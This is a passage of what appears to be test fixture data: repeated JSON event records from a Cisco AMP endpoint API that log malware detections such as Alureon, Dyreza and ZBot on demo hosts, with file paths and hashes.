ca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat 